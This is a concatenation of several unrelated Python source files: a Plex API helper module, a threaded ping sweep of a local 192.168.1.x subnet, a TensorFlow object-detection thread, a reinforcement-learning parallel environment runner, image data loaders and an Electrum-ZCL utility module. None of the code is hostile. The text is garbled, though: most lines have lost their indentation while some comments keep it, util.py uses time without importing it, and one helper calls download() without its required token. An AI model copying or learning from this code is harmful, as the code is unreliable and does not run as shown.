threads[-1].setDaemon(True)
threads[-1].start()
while not job_is_done_event.is_set():
if all([not t.is_alive() for t in threads]):
break
time.sleep(0.05)
return [r for r in results if r is not None]
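# Illustrative sketch (not part of the original module): the callback passed to
# threaded() receives its own *args plus a shared results list and its slot index
# (both appended by threaded()), and a job_is_done_event keyword argument it may
# set to end the wait loop early.
def _threaded_example():
    def square(value, results, index, job_is_done_event=None):
        results[index] = value * value
    return threaded(square, [[2], [3], [4]])     # -> [4, 9, 16]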
def toDatetime(value, format=None):
""" Returns a datetime object from the specified value.
Parameters:
value (str): value to return as a datetime
format (str): Format to pass strftime (optional; if value is a str).
"""
if value and value is not None:
if format:
value = datetime.strptime(value, format)
else:
# https://bugs.python.org/issue30684
            # Platform support for pre-epoch timestamps also seems to be flaky.
            # TODO: check for other errors too.
if int(value) == 0:
value = 86400
value = datetime.fromtimestamp(int(value))
return value
def toList(value, itemcast=None, delim=','):
""" Returns a list of strings from the specified value.
Parameters:
value (str): comma delimited string to convert to list.
itemcast (func): Function to cast each list item to (default str).
delim (str): string delimiter (optional; default ',').
"""
value = value or ''
itemcast = itemcast or str
return [itemcast(item) for item in value.split(delim) if item != '']
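# Illustrative sketch (not part of the original module): splitting a comma
# separated attribute string and casting each item.
def _tolist_example():
    assert toList('1,2,3', itemcast=int) == [1, 2, 3]
    assert toList(None) == []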
def downloadSessionImages(server, filename=None, height=150, width=150,
opacity=100, saturation=100): # pragma: no cover
""" Helper to download a bif image or thumb.url from plex.server.sessions.
Parameters:
            filename (str): Defaults to None.
height (int): Height of the image.
width (int): width of the image.
opacity (int): Opacity of the resulting image (possibly deprecated).
            saturation (int): Saturation of the resulting image.
Returns:
{'hellowlol': {'filepath': '<filepath>', 'url': 'http://<url>'},
{'<username>': {filepath, url}}, ...
"""
info = {}
for media in server.sessions():
url = None
for part in media.iterParts():
if media.thumb:
url = media.thumb
if part.indexes: # always use bif images if available.
url = '/library/parts/%s/indexes/%s/%s' % (part.id, part.indexes.lower(), media.viewOffset)
if url:
if filename is None:
prettyname = media._prettyfilename()
filename = 'session_transcode_%s_%s_%s' % (media.usernames[0], prettyname, int(time.time()))
url = server.transcodeImage(url, height, width, opacity, saturation)
filepath = download(url, filename=filename)
            info[media.usernames[0]] = {'filepath': filepath, 'url': url}
return info
def download(url, token, filename=None, savepath=None, session=None, chunksize=4024,
unpack=False, mocked=False, showstatus=False):
""" Helper to download a thumb, videofile or other media item. Returns the local
path to the downloaded file.
Parameters:
            url (str): URL where the content can be reached.
token (str): Plex auth token to include in headers.
filename (str): Filename of the downloaded file, default None.
savepath (str): Defaults to current working dir.
            chunksize (int): Chunk size to use when reading and writing the response.
            mocked (bool): Do everything except actually write the file (useful for testing).
unpack (bool): Unpack the zip file.
showstatus(bool): Display a progressbar.
Example:
>>> download(a_episode.getStreamURL(), a_episode.location)
/path/to/file
"""
from plexapi import log
# fetch the data to be saved
session = session or requests.Session()
headers = {'X-Plex-Token': token}
response = session.get(url, headers=headers, stream=True)
# make sure the savepath directory exists
savepath = savepath or os.getcwd()
compat.makedirs(savepath, exist_ok=True)
# try getting filename from header if not specified in arguments (used for logs, db)
if not filename and response.headers.get('Content-Disposition'):
filename = re.findall(r'filename=\"(.+)\"', response.headers.get('Content-Disposition'))
filename = filename[0] if filename[0] else None
filename = os.path.basename(filename)
fullpath = os.path.join(savepath, filename)
# append file.ext from content-type if not already there
extension = os.path.splitext(fullpath)[-1]
if not extension:
contenttype = response.headers.get('content-type')
if contenttype and 'image' in contenttype:
fullpath += contenttype.split('/')[1]
# check this is a mocked download (testing)
if mocked:
log.debug('Mocked download %s', fullpath)
return fullpath
# save the file to disk
log.info('Downloading: %s', fullpath)
if showstatus: # pragma: no cover
total = int(response.headers.get('content-length', 0))
bar = tqdm(unit='B', unit_scale=True, total=total, desc=filename)
with open(fullpath, 'wb') as handle:
for chunk in response.iter_content(chunk_size=chunksize):
handle.write(chunk)
if showstatus:
bar.update(len(chunk))
if showstatus: # pragma: no cover
bar.close()
# check we want to unzip the contents
if fullpath.endswith('zip') and unpack:
with zipfile.ZipFile(fullpath, 'r') as handle:
handle.extractall(savepath)
return fullpath
def tag_helper(tag, items, locked=True, remove=False):
""" Simple tag helper for editing a object. """
if not isinstance(items, list):
items = [items]
data = {}
if not remove:
for i, item in enumerate(items):
tagname = '%s[%s].tag.tag' % (tag, i)
data[tagname] = item
if remove:
tagname = '%s[].tag.tag-' % tag
data[tagname] = ','.join(items)
data['%s.locked' % tag] = 1 if locked else 0
return data
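# Illustrative sketch (not part of the original module): the flat key/value
# payload tag_helper() builds for an edit request.
def _tag_helper_example():
    assert tag_helper('genre', ['Action', 'Comedy']) == {
        'genre[0].tag.tag': 'Action',
        'genre[1].tag.tag': 'Comedy',
        'genre.locked': 1,
    }
    assert tag_helper('genre', 'Action', remove=True) == {
        'genre[].tag.tag-': 'Action',
        'genre.locked': 1,
    }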
def getMyPlexAccount(opts=None): # pragma: no cover
""" Helper function tries to get a MyPlex Account instance by checking
        the following locations for a username and password. This is
useful to create user-friendly command line tools.
1. command-line options (opts).
2. environment variables and config.ini
3. Prompt on the command line.
"""
from plexapi import CONFIG
from plexapi.myplex import MyPlexAccount
# 1. Check command-line options
if opts and opts.username and opts.password:
print('Authenticating with Plex.tv as %s..' % opts.username)
return MyPlexAccount(opts.username, opts.password)
# 2. Check Plexconfig (environment variables and config.ini)
config_username = CONFIG.get('auth.myplex_username')
config_password = CONFIG.get('auth.myplex_password')
if config_username and config_password:
print('Authenticating with Plex.tv as %s..' % config_username)
return MyPlexAccount(config_username, config_password)
# 3. Prompt for username and password on the command line
username = input('What is your plex.tv username: ')
password = getpass('What is your plex.tv password: ')
print('Authenticating with Plex.tv as %s..' % username)
return MyPlexAccount(username, password)
def choose(msg, items, attr): # pragma: no cover
""" Command line helper to display a list of choices, asking the
user to choose one of the options.
"""
# Return the first item if there is only one choice
if len(items) == 1:
return items[0]
# Print all choices to the command line
print()
for index, i in enumerate(items):
name = attr(i) if callable(attr) else getattr(i, attr)
print(' %s: %s' % (index, name))
print()
# Request choice from the user
while True:
try:
inp = input('%s: ' % msg)
if any(s in inp for s in (':', '::', '-')):
idx = slice(*map(lambda x: int(x.strip()) if x.strip() else None, inp.split(':')))
return items[idx]
else:
return items[int(inp)]
except (ValueError, IndexError):
pass
|
ping1_basic.py
|
#! /usr/bin/env python3
# -*-coding:utf-8 -*-
# @Time : 2019/06/16 16:45:29
# @Author : che
# @Email : ch1huizong@gmail.com
from threading import Thread
import subprocess
from queue import Queue
num_threads = 3
queue = Queue()
ips = ["192.168.1.%d" % ip for ip in range(1, 255)]
def pinger(i, q):  # worker: does the actual pinging
while True:
ip = q.get()
print("Thread %s: Pinging %s" % (i, ip))
ret = subprocess.call(
"ping -c1 %s " % ip,
shell=True,
stdout=open("/dev/null", "w"), # 禁用输出
stderr=subprocess.STDOUT,
)
if ret == 0:
print("%s: is alive" % ip)
else:
print("%s: did not respond" % ip)
        q.task_done()  # mark this task as done
def main():
for i in range(num_threads):
worker = Thread(target=pinger, args=(i, queue))
worker.setDaemon(True)
worker.start()
    # add tasks to the queue
for ip in ips:
queue.put(ip)
print("Main Thread Waiting")
    queue.join()  # block the main thread until every queued task has been processed
print("Done")
# Note: switching between threads is scheduled by the operating system
main()
|
detection.py
|
'''
COPYRIGHT @ Grebtsew 2019
A simple object detection implementation
'''
import sys
sys.path.insert(0,'..')
import tensorflow as tf
from utils import label_map_util
import numpy as np
from threading import Thread
import os
import screen_overlay_handler
class Obj_Detection(Thread):
result = None
MODEL_NAME = 'ssd_mobilenet_v1_coco_11_06_2017'
# Path to frozen detection graph. This is the actual model that is used for the object detection.
PATH_TO_CKPT = '../models/' + MODEL_NAME + '/frozen_inference_graph.pb'
# List of the strings that is used to add correct label for each box.
CWD_PATH = os.path.dirname(os.getcwd())
PATH_TO_LABELS = os.path.join(CWD_PATH,'object_detection', 'data', 'mscoco_label_map.pbtxt')
NUM_CLASSES = 90
def __init__(self ):
Thread.__init__(self)
        self.frame = None  # input image; must be set by the caller before run() is invoked
        self.detection_graph = self.load_model()
#self.shared_variables.categorylist = categories
#self.shared_variables.category_max = self.NUM_CLASSES
#self.shared_variables.category_index = category_index
self.sess = tf.Session(graph=self.detection_graph)
print("Model successfully loaded! Detection Active!")
def load_model(self):
# Load model
print("Loading model")
detection_graph = tf.Graph()
with detection_graph.as_default():
od_graph_def = tf.GraphDef()
with tf.gfile.GFile(self.PATH_TO_CKPT, 'rb') as fid:
serialized_graph = fid.read()
od_graph_def.ParseFromString(serialized_graph)
tf.import_graph_def(od_graph_def, name='')
return detection_graph
    def run_async(self):
        thread = Thread(target=self.run)
        thread.start()
        return thread
def get_result(self):
# Deadlock warnings here but we will always only use one detection per frame so should be fine
while self.result is None:
pass
return self.result
def run(self):
if self.frame is not None:
image_np = self.frame
# Expand dimensions since the model expects images to have shape: [1, None, None, 3]
image_np_expanded = np.expand_dims(image_np, axis=0)
image_tensor = self.detection_graph.get_tensor_by_name('image_tensor:0')
# Each box represents a part of the image where a particular object was detected.
boxes = self.detection_graph.get_tensor_by_name('detection_boxes:0')
# Each score represent how level of confidence for each of the objects.
# Score is shown on the result image, together with the class label.
scores = self.detection_graph.get_tensor_by_name('detection_scores:0')
classes = self.detection_graph.get_tensor_by_name('detection_classes:0')
num_detections = self.detection_graph.get_tensor_by_name('num_detections:0')
self.result = self.sess.run(
[boxes, scores, classes, num_detections],
feed_dict={image_tensor: image_np_expanded})
# Actual detection.
return self.result
else:
return None
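# A minimal usage sketch (commented out; assumes the frozen graph referenced by
# PATH_TO_CKPT exists on disk and that `frame` is an image ndarray, e.g. from cv2):
#
#   detector = Obj_Detection()
#   detector.frame = frame                      # image to run detection on
#   detector.run_async()                        # or detector.run() for a blocking call
#   boxes, scores, classes, num = detector.get_result()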
|
parallel_runner.py
|
from envs import REGISTRY as env_REGISTRY
from functools import partial
from components.episode_buffer import EpisodeBatch
from multiprocessing import Pipe, Process
import numpy as np
import torch as th
# Based (very) heavily on SubprocVecEnv from OpenAI Baselines
# https://github.com/openai/baselines/blob/master/baselines/common/vec_env/subproc_vec_env.py
class ParallelRunner:
def __init__(self, args, logger):
self.args = args
self.logger = logger
self.batch_size = self.args.batch_size_run
# Make subprocesses for the envs
self.parent_conns, self.worker_conns = zip(*[Pipe() for _ in range(self.batch_size)])
env_fn = env_REGISTRY[self.args.env]
self.ps = [Process(target=env_worker, args=(worker_conn, CloudpickleWrapper(partial(env_fn, **self.args.env_args))))
for worker_conn in self.worker_conns]
for p in self.ps:
p.daemon = True
p.start()
self.parent_conns[0].send(("get_env_info", None))
self.env_info = self.parent_conns[0].recv()
self.episode_limit = self.env_info["episode_limit"]
self.t = 0
self.t_env = 0
self.train_returns = []
self.test_returns = []
self.train_stats = {}
self.test_stats = {}
self.log_train_stats_t = -100000
self.won_count = []
def setup(self, scheme, groups, preprocess, mac):
self.new_batch = partial(EpisodeBatch, scheme, groups, self.batch_size, self.episode_limit + 1,
preprocess=preprocess, device=self.args.device)
self.mac = mac
self.scheme = scheme
self.groups = groups
self.preprocess = preprocess
def get_env_info(self):
return self.env_info
def save_replay(self):
pass
def close_env(self):
for parent_conn in self.parent_conns:
parent_conn.send(("close", None))
def reset(self):
self.batch = self.new_batch()
# Reset the envs
for parent_conn in self.parent_conns:
parent_conn.send(("reset", None))
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Get the obs, state and avail_actions back
for parent_conn in self.parent_conns:
data = parent_conn.recv()
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
self.batch.update(pre_transition_data, ts=0)
self.t = 0
self.env_steps_this_run = 0
def run(self, test_mode=False):
self.reset()
all_terminated = False
episode_returns = [0 for _ in range(self.batch_size)]
episode_lengths = [0 for _ in range(self.batch_size)]
self.mac.init_hidden(batch_size=self.batch_size)
terminated = [False for _ in range(self.batch_size)]
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
final_env_infos = [] # may store extra stats like battle won. this is filled in ORDER OF TERMINATION
while True:
# Pass the entire batch of experiences up till now to the agents
# Receive the actions for each agent at this timestep in a batch for each un-terminated env
actions = self.mac.select_actions(self.batch, t_ep=self.t, t_env=self.t_env, bs=envs_not_terminated, test_mode=test_mode)
cpu_actions = actions.to("cpu").numpy()
# Update the actions taken
actions_chosen = {
"actions": actions.unsqueeze(1)
}
self.batch.update(actions_chosen, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Send actions to each env
action_idx = 0
for idx, parent_conn in enumerate(self.parent_conns):
if idx in envs_not_terminated: # We produced actions for this env
if not terminated[idx]: # Only send the actions to the env if it hasn't terminated
parent_conn.send(("step", cpu_actions[action_idx]))
action_idx += 1 # actions is not a list over every env
# Update envs_not_terminated
envs_not_terminated = [b_idx for b_idx, termed in enumerate(terminated) if not termed]
all_terminated = all(terminated)
if all_terminated:
break
# Post step data we will insert for the current timestep
post_transition_data = {
"reward": [],
"terminated": []
}
# Data for the next step we will insert in order to select an action
pre_transition_data = {
"state": [],
"avail_actions": [],
"obs": []
}
# Receive data back for each unterminated env
for idx, parent_conn in enumerate(self.parent_conns):
if not terminated[idx]:
data = parent_conn.recv()
# Remaining data for this current timestep
post_transition_data["reward"].append((data["reward"],))
episode_returns[idx] += self.args.gamma**self.t * (data["reward"]*self.env_info['n_agents'])
episode_lengths[idx] += 1
if not test_mode:
self.env_steps_this_run += 1
env_terminated = False
if data["terminated"]:
final_env_infos.append(data["info"])
if test_mode and 'battle_won' in data['info'].keys():
self.won_count.append(data["info"]['battle_won'])
if data["terminated"] and not data["info"].get("episode_limit", False):
env_terminated = True
terminated[idx] = data["terminated"]
post_transition_data["terminated"].append((env_terminated,))
# Data for the next timestep needed to select an action
pre_transition_data["state"].append(data["state"])
pre_transition_data["avail_actions"].append(data["avail_actions"])
pre_transition_data["obs"].append(data["obs"])
# Add post_transiton data into the batch
self.batch.update(post_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=False)
# Move onto the next timestep
self.t += 1
# Add the pre-transition data
self.batch.update(pre_transition_data, bs=envs_not_terminated, ts=self.t, mark_filled=True)
if not test_mode:
self.t_env += self.env_steps_this_run
# Get stats back for each env
for parent_conn in self.parent_conns:
parent_conn.send(("get_stats",None))
env_stats = []
for parent_conn in self.parent_conns:
env_stat = parent_conn.recv()
env_stats.append(env_stat)
cur_stats = self.test_stats if test_mode else self.train_stats
cur_returns = self.test_returns if test_mode else self.train_returns
log_prefix = "test_" if test_mode else ""
infos = [cur_stats] + final_env_infos
cur_stats.update({k: sum(d.get(k, 0) for d in infos) for k in set.union(*[set(d) for d in infos])})
cur_stats["n_episodes"] = self.batch_size + cur_stats.get("n_episodes", 0)
cur_stats["ep_length"] = sum(episode_lengths) + cur_stats.get("ep_length", 0)
cur_returns.extend(episode_returns)
n_test_runs = max(1, self.args.test_nepisode // self.batch_size) * self.batch_size
# if test_mode and (len(self.test_returns) == n_test_runs):
# self._log(cur_returns, cur_stats, log_prefix)
# elif self.t_env - self.log_train_stats_t >= self.args.runner_log_interval:
# self._log(cur_returns, cur_stats, log_prefix)
# if hasattr(self.mac.action_selector, "epsilon"):
# self.logger.log_stat("epsilon", self.mac.action_selector.epsilon, self.t_env)
# self.log_train_stats_t = self.t_env
return self.batch
def _log(self, returns, stats, prefix):
self.logger.log_stat(prefix + "return_mean", np.mean(returns), self.t_env)
self.logger.log_stat(prefix + "return_std", np.std(returns), self.t_env)
returns.clear()
for k, v in stats.items():
if k != "n_episodes":
self.logger.log_stat(prefix + k + "_mean", v / stats["n_episodes"], self.t_env)
stats.clear()
def env_worker(remote, env_fn):
# Make environment
env = env_fn.x()
while True:
cmd, data = remote.recv()
if cmd == "step":
actions = data
# Take a step in the environment
reward, terminated, env_info = env.step(actions)
# Return the observations, avail_actions and state to make the next action
state = env.get_state()
avail_actions = env.get_avail_actions()
obs = env.get_obs()
remote.send({
# Data for the next timestep needed to pick an action
"state": state,
"avail_actions": avail_actions,
"obs": obs,
# Rest of the data for the current timestep
"reward": reward,
"terminated": terminated,
"info": env_info
})
elif cmd == "reset":
env.reset()
remote.send({
"state": env.get_state(),
"avail_actions": env.get_avail_actions(),
"obs": env.get_obs()
})
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_env_info":
remote.send(env.get_env_info())
elif cmd == "get_stats":
remote.send(env.get_stats())
else:
raise NotImplementedError
class CloudpickleWrapper():
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
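# Why CloudpickleWrapper: the env constructor handed to each worker is a functools.partial
# over a registry entry, which the default pickler used by multiprocessing may refuse to
# serialize; wrapping it defers serialization to cloudpickle, and env_worker unwraps it by
# calling env_fn.x(). A minimal sketch (hypothetical registry key and env kwargs):
#
#   env_fn = env_REGISTRY["sc2"]
#   wrapped = CloudpickleWrapper(partial(env_fn, map_name="3m"))
#   p = Process(target=env_worker, args=(worker_conn, wrapped))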
|
data_updater.py
|
from apitizer import db_controller
from apitizer import img_parser
import threading
import time
import cv2
class Updater:
def __init__(self, parser_config):
self.parser = img_parser.ImageParser(parser_config)
self.db_controller = db_controller.DatabaseController()
self.runner_thread = threading.Thread(target=self.run)
def initiate(self):
self.runner_thread.start()
def update(self):
results = self.parser.get_results()
self.db_controller.insert_or_update(results)
def run(self):
while True:
try:
self.update()
print("Image updated")
except cv2.error:
print("Can not process image")
except AttributeError:
print("None type object appeared in result")
except KeyError:
print("Missing key in result")
except Exception:
print("unknown error")
time.sleep(60)
|
data.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import math
import random
import cv2
import numpy as np
from queue import Queue
from threading import Thread as Process
#from multiprocessing import Process,Queue
import time
from .utils import *
from skimage.io import imread
from skimage.transform import resize
class DataSet(object):
"""TextDataSet
process text input file dataset
text file format:
image_path
"""
def __init__(self, common_params=None, dataset_params=None):
"""
Args:
common_params: A dict
dataset_params: A dict
"""
if common_params:
self.image_size = int(common_params['image_size'])
self.batch_size = int(common_params['batch_size'])
if dataset_params:
self.data_path = str(dataset_params['path'])
self.thread_num = int(int(dataset_params['thread_num']) / 2)
self.thread_num2 = int(int(dataset_params['thread_num']) / 2)
#record and image_label queue
self.record_queue = Queue(maxsize=10000)
self.image_queue = Queue(maxsize=5000)
self.batch_queue = Queue(maxsize=100)
self.record_list = []
# filling the record_list
input_file = open(self.data_path, 'r')
for line in input_file:
line = line.strip()
self.record_list.append(line)
self.record_point = 0
self.record_number = len(self.record_list)
self.num_batch_per_epoch = int(self.record_number / self.batch_size)
t_record_producer = Process(target=self.record_producer)
t_record_producer.daemon = True
t_record_producer.start()
for i in range(self.thread_num):
t = Process(target=self.record_customer)
t.daemon = True
t.start()
for i in range(self.thread_num2):
t = Process(target=self.image_customer)
t.daemon = True
t.start()
def record_producer(self):
"""record_queue's processor
"""
while True:
if self.record_point % self.record_number == 0:
random.shuffle(self.record_list)
self.record_point = 0
self.record_queue.put(self.record_list[self.record_point])
self.record_point += 1
def image_process(self, image):
"""Randomly resize, mirror-flip and crop a single image.
Args:
image: 3-D ndarray (BGR, as returned by cv2.imread)
Returns:
image: 3-D ndarray (RGB, image_size x image_size)
"""
h = image.shape[0]
w = image.shape[1]
if w > h:
image = cv2.resize(image, (int(self.image_size * w / h), self.image_size))
mirror = np.random.randint(0, 2)
if mirror:
image = np.fliplr(image)
crop_start = np.random.randint(0, int(self.image_size * w / h) - self.image_size + 1)
image = image[:, crop_start:crop_start + self.image_size, :]
else:
image = cv2.resize(image, (self.image_size, int(self.image_size * h / w)))
mirror = np.random.randint(0, 2)
if mirror:
image = np.fliplr(image)
crop_start = np.random.randint(0, int(self.image_size * h / w) - self.image_size + 1)
image = image[crop_start:crop_start + self.image_size, :, :]
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
return image
def record_customer(self):
"""record queue's customer
"""
while True:
item = self.record_queue.get()
out = cv2.imread(item)
if out is not None and len(out.shape) == 3 and out.shape[2] == 3:
self.image_queue.put(out)
def image_customer(self):
while True:
images = []
for i in range(self.batch_size):
image = self.image_queue.get()
image = self.image_process(image)
images.append(image)
images = np.asarray(images, dtype=np.uint8)
self.batch_queue.put(preprocess(images))
def batch(self):
"""get batch
Returns:
images: 4-D ndarray [batch_size, height, width, 3]
"""
print(self.record_queue.qsize(), self.image_queue.qsize(), self.batch_queue.qsize())
return self.batch_queue.get()
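# A minimal usage sketch (hypothetical values; 'train.txt' is assumed to list one image
# path per line, matching the class docstring above):
#
#   dataset = DataSet(common_params={'image_size': 224, 'batch_size': 32},
#                     dataset_params={'path': 'train.txt', 'thread_num': 4})
#   images = dataset.batch()   # blocks until a preprocessed batch is ready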
|
util.py
|
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import binascii
import os, sys, re, json
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urllib
import threading
import hmac
import requests
from .i18n import _
import urllib.request, urllib.parse, urllib.error
import queue
def inv_dict(d):
return {v: k for k, v in d.items()}
is_bundle = getattr(sys, 'frozen', False)
is_macOS = sys.platform == 'darwin'
base_units = {'ZCL':8, 'mZCL':5, 'uZCL':2}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class NoDynamicFeeEstimates(Exception):
def __str__(self):
return _('Dynamic fee estimates not available')
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from .transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except Exception as e:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
# TODO: disable
is_verbose = True
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=Decimal)
except:
return x
# taken from Django Source Code
def constant_time_compare(val1, val2):
"""Return True if the two strings are equal, False otherwise."""
return hmac.compare_digest(to_bytes(val1, 'utf8'), to_bytes(val2, 'utf8'))
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.__name__
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
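# Minimal usage sketch of the profiler decorator (hypothetical function name):
#
#   @profiler
#   def load_transactions(path):
#       ...
#
# Each call then prints something like "[profiler] load_transactions 0.1234" via print_error.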
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_dir():
d = android_ext_dir() + '/org.electrum.electrum'
if not os.path.exists(d):
os.mkdir(d)
return d
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_dir() + '/blockchain_headers'
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_dir(config):
return android_headers_dir() if 'ANDROID_DATA' in os.environ else config.path
def assert_bytes(*args):
"""
porting helper, assert args type
"""
try:
for x in args:
assert isinstance(x, (bytes, bytearray))
except:
print('assert bytes failed', list(map(type, args)))
raise
def assert_str(*args):
"""
porting helper, assert args type
"""
for x in args:
assert isinstance(x, str)
def to_string(x, enc):
if isinstance(x, (bytes, bytearray)):
return x.decode(enc)
if isinstance(x, str):
return x
else:
raise TypeError("Not a string or bytes like object")
def to_bytes(something, encoding='utf8'):
"""
cast a string to a bytes-like object; a bytearray is copied to bytes (kept for Python 2 porting support)
"""
if isinstance(something, bytes):
return something
if isinstance(something, str):
return something.encode(encoding)
elif isinstance(something, bytearray):
return bytes(something)
else:
raise TypeError("Not a string or bytes like object")
bfh = bytes.fromhex
hfu = binascii.hexlify
def bh2u(x):
"""
str with hex representation of a bytes-like object
>>> x = bytes((1, 2, 10))
>>> bh2u(x)
'01020a'
:param x: bytes
:rtype: str
"""
return hfu(x).decode('ascii')
def user_dir():
if 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
elif os.name == 'posix':
return os.path.join(os.environ["HOME"], ".electrum-zcl")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zcl")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zcl")
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
"""Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator"""
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
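# Examples (sketch), with the default decimal_point of 8:
#   format_satoshis_plain(150000000) -> '1.5'
#   format_satoshis_plain(123)       -> '0.00000123'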
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'Unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
